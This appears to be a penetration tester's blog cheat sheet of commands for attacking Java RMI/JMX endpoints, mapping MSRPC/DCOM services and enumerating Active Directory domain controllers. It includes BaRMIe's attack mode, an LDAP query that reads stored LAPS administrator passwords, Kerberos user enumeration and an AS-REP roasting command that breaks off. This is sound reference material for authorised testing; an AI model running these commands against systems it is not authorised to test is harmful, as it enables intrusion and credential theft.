Posts

Showing posts from October, 2022

JMX RMI Pentest

RMI can be run on any nonstandard port, and when RMI is running you will observe one more endpoint port connected to it (find it easily with nmap by running rmi-dumpregistry). The #jmxrmi bound name and its signatures might be vulnerable to the MLetMBean vuln, where an MBean can be used for loading additional MBeans over the network.

java.lang.String getVersion()
javax.management.remote.rmi.RMIConnection newClient(java.lang.Object arg)

Java RMI Registry - Port 1616
nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616

BaRMIe
#Download the package from releases https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01
java -jar BaRMIe.jar -enum 192.168.1.11 5000
java -jar BaRMIe.jar -attack 192.168.1.11 5000

Remote Method Guesser
https://github.com/qtc-de/remote-method-guesser
java -jar rmg-3.0.0-jar-with-dependencies.jar 10.10.10.10 5000 enum
#Look for Vulnerabilities
java -jar rmg.jar enum 10.10.10.10 5000
#Get bound names & available method

RPC Mapper Pentest - Port 135, 593

rpcdump.py 10.10.10.10 -p 593

TCP 135 is the Endpoint Mapper and Component Object Model (COM) Service Control Manager. There is a tool called rpcmap.py from Impacket that will show these mappings. This tool needs a stringbinding argument to establish its connection. The examples from -h are:

stringbinding  String binding to connect to MSRPC interface, for example:
ncacn_ip_tcp:192.168.0.1[135]
ncacn_np:192.168.0.1[\pipe\spoolss]
ncacn_http:192.168.0.1[593]
ncacn_http:[6001,RpcProxy=exchange.contoso.com:443]
ncacn_http:localhost[3388,RpcProxy=rds.contoso:443]

rpcmap.py 'ncacn_ip_tcp:10.10.10.10'

Reference for MS-DCOM
#if you find IOXIDResolver in the UUIDs you can run the script below to
#list network interfaces
git clone https://github.com/mubix/IOXIDResolver.git
cd IOXIDResolver
python3 -m pip install -r requirements.txt
python IOXIDResolver.py -t 10.10.10.10

Other things to check
reg.py 10.10.10.10 query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s service

Pentesting Domain Controllers

DNS
dig srv domain.com @DC_IP
#Query ldap service
dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP
#Query Root Domain Controller
dig +short a rootdc.domain.com @DC_IP

LDAP Enum
#Nmap Scan for basic info
nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10
#Get Domain name
ldapsearch -x -h 10.10.10.10 -s base namingcontexts
ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts
#Look for misconfigs - Finding ms-MCS-AdmPwd
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
#Dump Everything
ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)'
#Dump Everything using ldeep
ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump

UserEnum
git clone https://github.com/Bhanunamikaze/Wordlists.git
cd Wordlists/Usernames
kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt

Find Pre-Auth Disabled Users
GetNPUsers.py domain/ -u